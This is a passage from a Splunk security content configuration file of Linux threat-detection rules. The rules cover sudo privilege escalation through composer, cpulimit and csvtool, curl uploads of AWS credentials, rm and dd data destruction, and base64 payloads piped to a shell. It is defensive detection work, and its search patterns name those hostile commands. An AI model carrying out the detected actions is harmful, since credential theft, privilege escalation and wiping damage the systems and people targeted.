"confidence": 30, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.001", "T1548"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name IN ("chmod", "chown", "fchmod", "fchmodat", "fchown", "fchownat", "fremovexattr", "fsetxattr", "lchown", "lremovexattr", "lsetxattr", "removexattr", "setuid", "setgid", "setreuid", "setregid", "chattr") OR Processes.process IN ("*chmod *", "*chown *", "*fchmod *", "*fchmodat *", "*fchown *", "*fchownat *", "*fremovexattr *", "*fsetxattr *", "*lchown *", "*lremovexattr *", "*lsetxattr *", "*removexattr *", "*setuid *", "*setgid *", "*setreuid *", "*setregid *", "*setcap *", "*chattr *") by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_common_process_for_elevation_control_filter` [ESCU - Linux Composer Privilege Escalation - Rule] action.escu = 0 action.escu.enabled = 1 description = Composer is a tool for dependency management in PHP. It allows you to declare the libraries your project depends on and it will manage (install/update) them for you. If sudo right is given to tool for the user, then the user can run system commands as root and possibly get a root shell. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = Composer is a tool for dependency management in PHP. It allows you to declare the libraries your project depends on and it will manage (install/update) them for you. If sudo right is given to tool for the user, then the user can run system commands as root and possibly get a root shell. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives may be present, filter as needed. action.escu.creation_date = 2022-08-11 action.escu.modification_date = 2022-08-11 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Composer Privilege Escalation - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Living Off The Land"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 10}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 10}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 10}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Composer Privilege Escalation - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Living Off The Land"], "cis20": ["CIS 10"], "confidence": 50, "impact": 20, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process="*composer*" AND Processes.process="*run-script*" AND Processes.process="*sudo*" by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_composer_privilege_escalation_filter` [ESCU - Linux Cpulimit Privilege Escalation - Rule] action.escu = 0 action.escu.enabled = 1 description = cpulimit is a simple program which attempts to limit the cpu usage of a process (expressed in percentage, not in cpu time). This is useful to control batch jobs, when you don't want them to eat too much cpu. If sudo right is given to the program for the user, then the user can run system commands as root and possibly get a root shell. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = cpulimit is a simple program which attempts to limit the cpu usage of a process (expressed in percentage, not in cpu time). This is useful to control batch jobs, when you don't want them to eat too much cpu. If sudo right is given to the program for the user, then the user can run system commands as root and possibly get a root shell. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives may be present, filter as needed. action.escu.creation_date = 2022-08-11 action.escu.modification_date = 2022-08-11 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Cpulimit Privilege Escalation - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Living Off The Land"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 20}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 20}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 20}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Cpulimit Privilege Escalation - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Living Off The Land"], "cis20": ["CIS 10"], "confidence": 50, "impact": 40, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process="*cpulimit*" AND Processes.process="*-l*" AND Processes.process="*-f*" AND Processes.process="*sudo*" by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_cpulimit_privilege_escalation_filter` [ESCU - Linux Csvtool Privilege Escalation - Rule] action.escu = 0 action.escu.enabled = 1 description = csvtool is an easy to use command-line tool to work with .CSV files. If sudo right is given to the tool for the user, then the user can run system commands as root and possibly get a root shell. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = csvtool is an easy to use command-line tool to work with .CSV files. If sudo right is given to the tool for the user, then the user can run system commands as root and possibly get a root shell. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives may be present, filter as needed. action.escu.creation_date = 2022-08-11 action.escu.modification_date = 2022-08-11 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Csvtool Privilege Escalation - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Living Off The Land"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 10}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 10}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 10}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Csvtool Privilege Escalation - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Living Off The Land"], "cis20": ["CIS 10"], "confidence": 50, "impact": 20, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process="*csvtool*" AND Processes.process="*call*" AND Processes.process="*sudo*" by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_csvtool_privilege_escalation_filter` [ESCU - Linux Curl Upload File - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies curl being utilized with the -F or --form, --upload-file, -T, -d, --data, --data-raw, -I and --head switches to upload AWS credentials or config to a remote destination. This enables uploading of binary files and so forth. To force the 'content' part to be a file, prefix the file name with an @ sign. To just get the content part from a file, prefix the file name with the symbol <. The difference between @ and < is then that @ makes a file get attached in the post as a file upload, while the < makes a text field and just get the contents for that text field from a file. This technique was utlized by the TeamTNT group to exfiltrate AWS credentials. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Command and Control"], "mitre_attack": ["T1105"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies curl being utilized with the -F or --form, --upload-file, -T, -d, --data, --data-raw, -I and --head switches to upload AWS credentials or config to a remote destination. This enables uploading of binary files and so forth. To force the 'content' part to be a file, prefix the file name with an @ sign. To just get the content part from a file, prefix the file name with the symbol <. The difference between @ and < is then that @ makes a file get attached in the post as a file upload, while the < makes a text field and just get the contents for that text field from a file. This technique was utlized by the TeamTNT group to exfiltrate AWS credentials. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Filtering may be required. In addition to AWS credentials, add other important files and monitor. The inverse would be to look for _all_ -F behavior and tune from there. action.escu.creation_date = 2022-07-29 action.escu.modification_date = 2022-07-29 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Curl Upload File - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Living Off The Land", "Data Exfiltration", "Ingress Tool Transfer"] action.risk = 1 action.risk.param._risk_message = An instance of $process_name$ was identified on endpoint $dest$ by user $user$ attempting to upload important files to a remote destination. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 64}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 64}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 64}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Curl Upload File - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Living Off The Land", "Data Exfiltration", "Ingress Tool Transfer"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Command and Control"], "mitre_attack": ["T1105"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies curl being utilized with the -F or --form, --upload-file, -T, -d, --data, --data-raw, -I and --head switches to upload AWS credentials or config to a remote destination. This enables uploading of binary files and so forth. To force the 'content' part to be a file, prefix the file name with an @ sign. To just get the content part from a file, prefix the file name with the symbol <. The difference between @ and < is then that @ makes a file get attached in the post as a file upload, while the < makes a text field and just get the contents for that text field from a file. This technique was utlized by the TeamTNT group to exfiltrate AWS credentials. action.notable.param.rule_title = Linux Curl Upload File action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=curl Processes.process IN ("*-F *", "*--form *","*--upload-file *","*-T *","*-d *","*--data *","*--data-raw *", "*-I *", "*--head *") AND Processes.process IN ("*.aws/credentials*". "*.aws/config*") by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_curl_upload_file_filter` [ESCU - Linux Data Destruction Command - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies a unix shell command that can wipe root folders of a linux host. This commandline is being abused by Awfulshred malware that wipes or corrupts files in a targeted Linux host. The shell command uses the rm command with force recursive deletion even in the root folder. This TTP can be a good indicator that a user or a process wants to wipe roots directory files in Linux host. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1485"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies a unix shell command that can wipe root folders of a linux host. This commandline is being abused by Awfulshred malware that wipes or corrupts files in a targeted Linux host. The shell command uses the rm command with force recursive deletion even in the root folder. This TTP can be a good indicator that a user or a process wants to wipe roots directory files in Linux host. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = unknown action.escu.creation_date = 2023-04-14 action.escu.modification_date = 2023-04-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Data Destruction Command - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["AwfulShred", "Data Destruction"] action.risk = 1 action.risk.param._risk_message = a $process_name$ execute rm command with --no-preserve-root parmeter that can wipe root files in $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 90}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 90}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Data Destruction Command - Rule action.correlationsearch.annotations = {"analytic_story": ["AwfulShred", "Data Destruction"], "cis20": ["CIS 10"], "confidence": 90, "impact": 100, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1485"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies a unix shell command that can wipe root folders of a linux host. This commandline is being abused by Awfulshred malware that wipes or corrupts files in a targeted Linux host. The shell command uses the rm command with force recursive deletion even in the root folder. This TTP can be a good indicator that a user or a process wants to wipe roots directory files in Linux host. action.notable.param.rule_title = Linux Data Destruction Command action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name = "rm" AND Processes.process IN ("* -rf*", "* -fr*") AND Processes.process = "* --no-preserve-root" by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `linux_data_destruction_command_filter` [ESCU - Linux DD File Overwrite - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic is to look for dd command to overwrite file. This technique was abused by adversaries or threat actor to destroy files or data on specific system or in a large number of host within network to interrupt host avilability, services and many more. This is also used to destroy data where it make the file irrecoverable by forensic techniques through overwriting files, data or local and remote drives. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1485"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic is to look for dd command to overwrite file. This technique was abused by adversaries or threat actor to destroy files or data on specific system or in a large number of host within network to interrupt host avilability, services and many more. This is also used to destroy data where it make the file irrecoverable by forensic techniques through overwriting files, data or local and remote drives. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrator or network operator can execute this command. Please update the filter macros to remove false positives. action.escu.creation_date = 2023-04-14 action.escu.modification_date = 2023-04-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux DD File Overwrite - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Data Destruction", "Industroyer2"] action.risk = 1 action.risk.param._risk_message = A commandline $process$ executed on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 64}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux DD File Overwrite - Rule action.correlationsearch.annotations = {"analytic_story": ["Data Destruction", "Industroyer2"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1485"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic is to look for dd command to overwrite file. This technique was abused by adversaries or threat actor to destroy files or data on specific system or in a large number of host within network to interrupt host avilability, services and many more. This is also used to destroy data where it make the file irrecoverable by forensic techniques through overwriting files, data or local and remote drives. action.notable.param.rule_title = Linux DD File Overwrite action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name = "dd" AND Processes.process = "*of=*" by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_dd_file_overwrite_filter` [ESCU - Linux Decode Base64 to Shell - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic detects the behavior of decoding base64-encoded data and passing it to a Linux shell. Additionally, it mitigates the potential damage and protects the organization's systems and data.The detection is made by searching for specific commands in the Splunk query, namely "base64 -d" and "base64 --decode", within the Endpoint.Processes data model. The analytic also includes a filter for Linux shells. The detection is important because it indicates the presence of malicious activity since Base64 encoding is commonly used to obfuscate malicious commands or payloads, and decoding it can be a step in running those commands. It suggests that an attacker is attempting to run malicious commands on a Linux system to gain unauthorized access, for data exfiltration, or perform other malicious actions. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1027", "T1059.004"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic detects the behavior of decoding base64-encoded data and passing it to a Linux shell. Additionally, it mitigates the potential damage and protects the organization's systems and data.The detection is made by searching for specific commands in the Splunk query, namely "base64 -d" and "base64 --decode", within the Endpoint.Processes data model. The analytic also includes a filter for Linux shells. The detection is important because it indicates the presence of malicious activity since Base64 encoding is commonly used to obfuscate malicious commands or payloads, and decoding it can be a step in running those commands. It suggests that an attacker is attempting to run malicious commands on a Linux system to gain unauthorized access, for data exfiltration, or perform other malicious actions. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives may be present based on legitimate software being utilized. Filter as needed. action.escu.creation_date = 2022-07-27 action.escu.modification_date = 2022-07-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Decode Base64 to Shell - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Living Off The Land"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ decoding base64 and passing it to a shell. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 25}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Decode Base64 to Shell - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Living Off The Land"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1027", "T1059.004"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic detects the behavior of decoding base64-encoded data and passing it to a Linux shell. Additionally, it mitigates the potential damage and protects the organization's systems and data.The detection is made by searching for specific commands in the Splunk query, namely "base64 -d" and "base64 --decode", within the Endpoint.Processes data model. The analytic also includes a filter for Linux shells. The detection is important because it indicates the presence of malicious activity since Base64 encoding is commonly used to obfuscate malicious commands or payloads, and decoding it can be a step in running those commands. It suggests that an attacker is attempting to run malicious commands on a Linux system to gain unauthorized access, for data exfiltration, or perform other malicious actions. action.notable.param.rule_title = Linux Decode Base64 to Shell action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process IN ("*base64 -d*","*base64 --decode*") AND Processes.process="*|*" `linux_shells` by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_decode_base64_to_shell_filter` [ESCU - Linux Deleting Critical Directory Using RM Command - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies a suspicious deletion of a critical folder in Linux machine using rm command. This technique was seen in industroyer2 campaign to wipe or destroy energy facilities of a targeted sector. Deletion in these list of folder is not so common since it need some elevated privileges to access some of it. We recommend to look further events specially in file access or file deletion, process commandline that may related to this technique. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1485"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies a suspicious deletion of a critical folder in Linux machine using rm command. This technique was seen in industroyer2 campaign to wipe or destroy energy facilities of a targeted sector. Deletion in these list of folder is not so common since it need some elevated privileges to access some of it. We recommend to look further events specially in file access or file deletion, process commandline that may related to this technique. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrator or network operator can use this application for automation purposes. Please update the filter macros to remove false positives. action.escu.creation_date = 2023-04-14 action.escu.modification_date = 2023-04-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Deleting Critical Directory Using RM Command - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["AwfulShred", "Data Destruction", "Industroyer2"] action.risk = 1 action.risk.param._risk_message = A deletion in known critical list of folder using rm command $process$ executed on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 64}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Deleting Critical Directory Using RM Command - Rule action.correlationsearch.annotations = {"analytic_story": ["AwfulShred", "Data Destruction", "Industroyer2"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1485"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies a suspicious deletion of a critical folder in Linux machine using rm command. This technique was seen in industroyer2 campaign to wipe or destroy energy facilities of a targeted sector. Deletion in these list of folder is not so common since it need some elevated privileges to access some of it. We recommend to look further events specially in file access or file deletion, process commandline that may related to this technique. action.notable.param.rule_title = Linux Deleting Critical Directory Using RM Command action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name =rm AND Processes.process= "* -rf *" AND Processes.process IN ("*/boot/*", "*/var/log/*", "*/etc/*", "*/dev/*") by Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid Processes.dest Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_deleting_critical_directory_using_rm_command_filter` [ESCU - Linux Deletion Of Cron Jobs - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic is to detect a deletion of cron job in a linux machine. This technique can be related to an attacker, threat actor or malware to disable scheduled cron 